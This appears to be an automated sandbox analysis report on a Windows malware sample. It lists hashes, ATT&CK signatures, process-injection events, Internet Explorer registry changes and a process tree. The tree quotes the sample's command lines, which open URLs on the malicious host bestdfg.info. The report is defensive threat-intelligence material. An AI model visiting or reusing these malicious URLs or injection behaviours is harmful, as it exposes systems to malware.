80e167dda3a0a7c81bf7a260f404ae9c2bc5d77ee426f6e2943b17a214d05154

Analysis

max time kernel
142s
max time network
139s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
22-08-2024 19:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe
Size

106KB
MD5

b8c946dafddbb3a8de2eb9318ca194d1
SHA1

c74b7df2f387e9279ce84a53b8138ba659708d14
SHA256

80e167dda3a0a7c81bf7a260f404ae9c2bc5d77ee426f6e2943b17a214d05154
SHA512

6dfc8930cfe6f8b870959a74ea43fb0e32151f5c8a6961e87e319070730b65f4b382c7f04c72ea9a315d75a5acc6e37857362c886dc98b458a3dad20fa600b37
SSDEEP

3072:xZMJnTeM4cJJOMILa77j2NZmOSyt+DDMuzWtVhUxxe:/eTeM/9ILI8Z2yQ/MGWcxk

Score

7^/10

discovery

Malware Config

Signatures

Deletes itself 1 IoCs

pid	Process
2360	explorer.exe

Loads dropped DLL 10 IoCs

pid	Process
3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe
3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe
3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe
3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe
3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe
3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe
3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe
3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe
3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe
3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3016 set thread context of 2360	3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe	68

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 22 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE

Modifies Internet Explorer settings 1 TTPs 49 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000082ebb0b9d6f3f0458e93e15bd38f268f00000000020000000000106600000001000020000000f417f6500375416f3b2050c6393ac7091e103da68a9c128f188da4e9569e1420000000000e8000000002000020000000771f262cce2b8d11ac92715341a0e8883f4856915aff3c118a678b6f28eb895b900000009ad374ece7a4f9f2e8ed263edde161538749384893b14893a6e2bd7e282f8e27cd8d921fd3ba97fadbf8fcd5db05636235b1e0e9d156c03e32bf82e2493528af0a5a334b66dd5c0cbac66a49f131e72540a2afd845e2ddb368be712d0049a1e59eff364ae425962a64a99ec73340413f2d4c827882c004ffe5281d8b87677d7766056072dbe5bd25c1de8ba53b6a3ac140000000876edb7bba87e2807a9567456aa497026a29863e909d806491dbb20285d02acd994774d07ac9b260c6e01a842c305bf97208e10d7c798f3ca63cd5947666156e	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff19000000190000009f0400007e020000	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3200000032000000b804000097020000	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\InternetRegistry	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\SearchScopes	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 506c658cc6f4da01	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Zoom	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\PageSetup	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\IntelliForms	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff4b00000000000000d104000065020000	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\LowRegistry	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{BFA0E681-60B9-11EF-8153-46FE39DD2993} = "0"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "430515505"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Toolbar	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff6400000019000000ea0400007e020000	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000082ebb0b9d6f3f0458e93e15bd38f268f00000000020000000000106600000001000020000000824b92db021ef11d4465811f393f3e37d26a16f3561334b3ebd390df79c7a8ce000000000e80000000020000200000009a3b4383c61551e8dc39441108a0de5edb7242a8d79c4530fc72f85852cbf80f2000000011b8018de1c9a81888401350c47a430cb776aa9f01362720abe0db395e7e6d8f40000000ff7384e9c15d6f6f9ca3b2d941fbbbfa63657e047f33c0d6f6d340542deba0343f5a6316c55b2a4f8b0e896ad3b55f590cd1720e03ab21b259c730be13a933d6	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE

Suspicious use of FindShellTrayWindow 12 IoCs

pid	Process
2612	IEXPLORE.EXE
2612	IEXPLORE.EXE
2612	IEXPLORE.EXE
2612	IEXPLORE.EXE
2612	IEXPLORE.EXE
2612	IEXPLORE.EXE
2612	IEXPLORE.EXE
2612	IEXPLORE.EXE
2612	IEXPLORE.EXE
2612	IEXPLORE.EXE
2612	IEXPLORE.EXE
2612	IEXPLORE.EXE

Suspicious use of SetWindowsHookEx 56 IoCs

pid	Process
2612	IEXPLORE.EXE
2612	IEXPLORE.EXE
3052	IEXPLORE.EXE
3052	IEXPLORE.EXE
3052	IEXPLORE.EXE
3052	IEXPLORE.EXE
2612	IEXPLORE.EXE
2612	IEXPLORE.EXE
2396	IEXPLORE.EXE
2396	IEXPLORE.EXE
2396	IEXPLORE.EXE
2396	IEXPLORE.EXE
2612	IEXPLORE.EXE
2612	IEXPLORE.EXE
2816	IEXPLORE.EXE
2816	IEXPLORE.EXE
2612	IEXPLORE.EXE
2612	IEXPLORE.EXE
596	IEXPLORE.EXE
596	IEXPLORE.EXE
596	IEXPLORE.EXE
596	IEXPLORE.EXE
2612	IEXPLORE.EXE
2612	IEXPLORE.EXE
3052	IEXPLORE.EXE
3052	IEXPLORE.EXE
2612	IEXPLORE.EXE
2612	IEXPLORE.EXE
2180	IEXPLORE.EXE
2180	IEXPLORE.EXE
2612	IEXPLORE.EXE
2612	IEXPLORE.EXE
2396	IEXPLORE.EXE
2396	IEXPLORE.EXE
2612	IEXPLORE.EXE
2612	IEXPLORE.EXE
620	IEXPLORE.EXE
620	IEXPLORE.EXE
2612	IEXPLORE.EXE
2612	IEXPLORE.EXE
2816	IEXPLORE.EXE
2816	IEXPLORE.EXE
2612	IEXPLORE.EXE
2612	IEXPLORE.EXE
1456	IEXPLORE.EXE
1456	IEXPLORE.EXE
2612	IEXPLORE.EXE
2612	IEXPLORE.EXE
1456	IEXPLORE.EXE
1456	IEXPLORE.EXE
2612	IEXPLORE.EXE
2612	IEXPLORE.EXE
2140	IEXPLORE.EXE
2140	IEXPLORE.EXE
2140	IEXPLORE.EXE
2140	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3016 wrote to memory of 2880	3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe	32
PID 3016 wrote to memory of 2880	3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe	32
PID 3016 wrote to memory of 2880	3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe	32
PID 3016 wrote to memory of 2880	3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe	32
PID 3016 wrote to memory of 2880	3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe	32
PID 3016 wrote to memory of 2880	3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe	32
PID 3016 wrote to memory of 2880	3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe	32
PID 2880 wrote to memory of 2612	2880	iexplore.exe	33
PID 2880 wrote to memory of 2612	2880	iexplore.exe	33
PID 2880 wrote to memory of 2612	2880	iexplore.exe	33
PID 2880 wrote to memory of 2612	2880	iexplore.exe	33
PID 2612 wrote to memory of 3052	2612	IEXPLORE.EXE	34
PID 2612 wrote to memory of 3052	2612	IEXPLORE.EXE	34
PID 2612 wrote to memory of 3052	2612	IEXPLORE.EXE	34
PID 2612 wrote to memory of 3052	2612	IEXPLORE.EXE	34
PID 2612 wrote to memory of 3052	2612	IEXPLORE.EXE	34
PID 2612 wrote to memory of 3052	2612	IEXPLORE.EXE	34
PID 2612 wrote to memory of 3052	2612	IEXPLORE.EXE	34
PID 3016 wrote to memory of 2480	3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe	36
PID 3016 wrote to memory of 2480	3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe	36
PID 3016 wrote to memory of 2480	3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe	36
PID 3016 wrote to memory of 2480	3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe	36
PID 3016 wrote to memory of 2480	3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe	36
PID 3016 wrote to memory of 2480	3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe	36
PID 3016 wrote to memory of 2480	3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe	36
PID 2480 wrote to memory of 2460	2480	iexplore.exe	37
PID 2480 wrote to memory of 2460	2480	iexplore.exe	37
PID 2480 wrote to memory of 2460	2480	iexplore.exe	37
PID 2480 wrote to memory of 2460	2480	iexplore.exe	37
PID 2612 wrote to memory of 2396	2612	IEXPLORE.EXE	38
PID 2612 wrote to memory of 2396	2612	IEXPLORE.EXE	38
PID 2612 wrote to memory of 2396	2612	IEXPLORE.EXE	38
PID 2612 wrote to memory of 2396	2612	IEXPLORE.EXE	38
PID 2612 wrote to memory of 2396	2612	IEXPLORE.EXE	38
PID 2612 wrote to memory of 2396	2612	IEXPLORE.EXE	38
PID 2612 wrote to memory of 2396	2612	IEXPLORE.EXE	38
PID 3016 wrote to memory of 2748	3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe	40
PID 3016 wrote to memory of 2748	3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe	40
PID 3016 wrote to memory of 2748	3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe	40
PID 3016 wrote to memory of 2748	3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe	40
PID 3016 wrote to memory of 2748	3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe	40
PID 3016 wrote to memory of 2748	3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe	40
PID 3016 wrote to memory of 2748	3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe	40
PID 2748 wrote to memory of 2756	2748	iexplore.exe	41
PID 2748 wrote to memory of 2756	2748	iexplore.exe	41
PID 2748 wrote to memory of 2756	2748	iexplore.exe	41
PID 2748 wrote to memory of 2756	2748	iexplore.exe	41
PID 2612 wrote to memory of 2816	2612	IEXPLORE.EXE	42
PID 2612 wrote to memory of 2816	2612	IEXPLORE.EXE	42
PID 2612 wrote to memory of 2816	2612	IEXPLORE.EXE	42
PID 2612 wrote to memory of 2816	2612	IEXPLORE.EXE	42
PID 2612 wrote to memory of 2816	2612	IEXPLORE.EXE	42
PID 2612 wrote to memory of 2816	2612	IEXPLORE.EXE	42
PID 2612 wrote to memory of 2816	2612	IEXPLORE.EXE	42
PID 3016 wrote to memory of 2752	3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe	43
PID 3016 wrote to memory of 2752	3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe	43
PID 3016 wrote to memory of 2752	3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe	43
PID 3016 wrote to memory of 2752	3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe	43
PID 3016 wrote to memory of 2752	3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe	43
PID 3016 wrote to memory of 2752	3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe	43
PID 3016 wrote to memory of 2752	3016	b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe	43
PID 2752 wrote to memory of 2108	2752	iexplore.exe	44
PID 2752 wrote to memory of 2108	2752	iexplore.exe	44
PID 2752 wrote to memory of 2108	2752	iexplore.exe	44

C:\Users\Admin\AppData\Local\Temp\b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\b8c946dafddbb3a8de2eb9318ca194d1_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3016
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://dsdc.bestdfg.info:251/?t=822&i=ie&731c0c50ae0e67c01f430293c47e554879985f75=731c0c50ae0e67c01f430293c47e554879985f75&uu=JaffaCakes118&731c0c50ae0e67c01f430293c47e554879985f75
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2880
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://dsdc.bestdfg.info:251/?t=822&i=ie&731c0c50ae0e67c01f430293c47e554879985f75=731c0c50ae0e67c01f430293c47e554879985f75&uu=JaffaCakes118&731c0c50ae0e67c01f430293c47e554879985f75
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2612
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2612 CREDAT:275457 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:3052
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2612 CREDAT:603154 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2396
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2612 CREDAT:734232 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2816
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2612 CREDAT:603175 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:596
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2612 CREDAT:799795 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2180
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2612 CREDAT:210008 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:620
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2612 CREDAT:210031 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:1456
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2612 CREDAT:4142113 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2140
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a1&tt=822&ur=JaffaCakes118&731c0c50ae0e67c01f430293c47e554879985f75
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2480
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a1&tt=822&ur=JaffaCakes118&731c0c50ae0e67c01f430293c47e554879985f75
    3⤵
    PID:2460
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a2&tt=822&ur=JaffaCakes118&731c0c50ae0e67c01f430293c47e554879985f75
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2748
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a2&tt=822&ur=JaffaCakes118&731c0c50ae0e67c01f430293c47e554879985f75
    3⤵
    PID:2756
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a3&tt=822&ur=JaffaCakes118&731c0c50ae0e67c01f430293c47e554879985f75
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2752
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a3&tt=822&ur=JaffaCakes118&731c0c50ae0e67c01f430293c47e554879985f75
    3⤵
    PID:2108
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a4&tt=822&ur=JaffaCakes118&731c0c50ae0e67c01f430293c47e554879985f75
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2192
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a4&tt=822&ur=JaffaCakes118&731c0c50ae0e67c01f430293c47e554879985f75
    3⤵
    PID:1924
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a5&tt=822&ur=JaffaCakes118&731c0c50ae0e67c01f430293c47e554879985f75
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2900
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
